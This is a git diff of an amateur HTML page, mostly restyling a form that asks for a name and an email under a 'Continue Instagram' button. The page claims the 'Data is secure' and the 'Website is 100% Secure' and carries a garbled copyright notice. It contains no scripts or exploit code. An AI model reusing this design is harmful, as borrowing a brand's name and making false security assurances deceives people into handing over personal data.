--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<html style="transform-box: view-box;margin: 0;background :#3066e1;page-break-inside: avoid;size: revert;background-blend-mode: screen;-webkit-user-modify: read-only;padding: 0;"><head>
+<html style="transform-box: view-box;margin: 0;background: #000000;page-break-inside: avoid;size: revert;background-blend-mode: screen;-webkit-user-modify: read-only;padding: 0;"><head>
 	<title></title>
 <style type="text/css" media="screen">
 	* {
@@ -13,30 +13,31 @@
 </head>
 <body>
 	<h3 style="
+    width: 500px;
     background: black;
-    font-size: 2pc;
+    font-size: 1pc;
     color: antiquewhite;
 "> Note if:: we should not post this details in phpadmin |||| Data is secure ||||</h3>
-	<h1 style="background: #70ff03;margin-left: 10pc;"> Confirm </h1>
+	<pre style="background:#3066e1;width: 500px;"> We Continue work on it and update soon as possible</pre>
 	<div class="form-inner">
-		<form action="indexx.html" method="get" accept-charset="utf-8">
+		<form action="indexx.html" target="_blank" method="get" accept-charset="utf-8">
 
 			<div class="field">
 				<label for="text" style="
     background: black;
-    font-size: 6pc;
+    font-size: 3pc;
     color: aliceblue;
 ">What is Your Name ?</label>
 
 				<br>
 			
 				<button><input type="text" name="Name" value="" placeholder="Person" maxlength="10" required="" minlength="6" style="
-    font-size: 4pc;
-					width:20pc;
+    font-size: 2pc;
     background: white;
-    color: aqua;
+    color: #6f2893;
     "></button><input type="reset" style="
-    background: antiquewhite;
+    font-size: 20px;
+    background: #fbcc8d;
 ">
 				<div class="field" style="
     font-size: 3pc;
@@ -44,20 +45,21 @@
 					<label for="" style="
     background: black;
     /* background: bottom; */
-    font-size: 7pc;
+    font-size: 2pc;
     color: #e4a3ff;
 "> Email </label>
 					<br>
 					
-					<input type="email" name="email" maxlength="30" style="background: #ffc4c4;font-size: 3pc;width: 50pc;/* margin: 2pc; */color: red;" suggest="" required="" minlength="10"><input type="reset" style="
-    background: aliceblue;
+					<input type="email" name="email" maxlength="30" style="background: #ffc4c4;font-size: 2pc;width: 30pc;/* margin: 2pc; */color: red;" suggest="" required="" minlength="10"><input type="reset" style="
+    background: #2398ff;
+    font-size: 20px;
 ">
 				
 					<div class="btn-layer">
 <button><input type="submit" name="Submit" value="Continue Instagram" style="
     background: black;
-    font-size: 5pc;
-    color: aqua;
+    font-size: 2pc;
+    color: #bfffff;
     "></button>						
 					</div>
 				</div>
@@ -67,15 +69,27 @@
 	</div>
 
 <h6 style="
-    font-size: 3pc;
+    width: 500px;
+    font-weight: 900;
+    font-size: 2pc;
     background: black;
     color: aliceblue;
 "> WEBSITE COPYRIGHT :UNDER SECTION 2007 THIS WEBSITE ONLY for FAIR USE This Website is 100% Secure</h6>
-<!-- <div class="" style="background-image: url(https://instagram.fixc4-1.fna.fbcdn.net/v/t51.2885-19/s320x320/173110702_272913304510871_7992720722384993176_n.jpg?tp=1&amp;_nc_ht=instagram.fixc4-1.fna.fbcdn.net&amp;_nc_ohc=HoFy-u6CVn0AX9hVkxO&amp;edm=ABfd0MgAAAAA&amp;ccb=7-4&amp;oh=44a7465cef979d7369a425f3244bf3d6&amp;oe=609DC7E4&amp;_nc_sid=7bff83)"> -->
-<video width="" height="" controls="" allow="autoplay" autoplay>
+
+<video width="" height="" allow="autoplay" autoplay="" style="
+    background: #778129;
+    margin: 12vh;
+    background-size: cover;
+    border: azure;
+    border-left: blanchedalmond;
+    font-family: -webkit-body;
+    /* -webkit-user-modify: read-only; */
+    -webkit-user-modify: read-write;
+    width: 500px;
+    height: 500px;
+" controls="">
 	<source src="pasand.mp4" type="video/mp4" allow="autoplay">
 </video>
-	
-</div>
 
+<h2> This is Optimized for pc Not For Android</h2>
 </body></html>
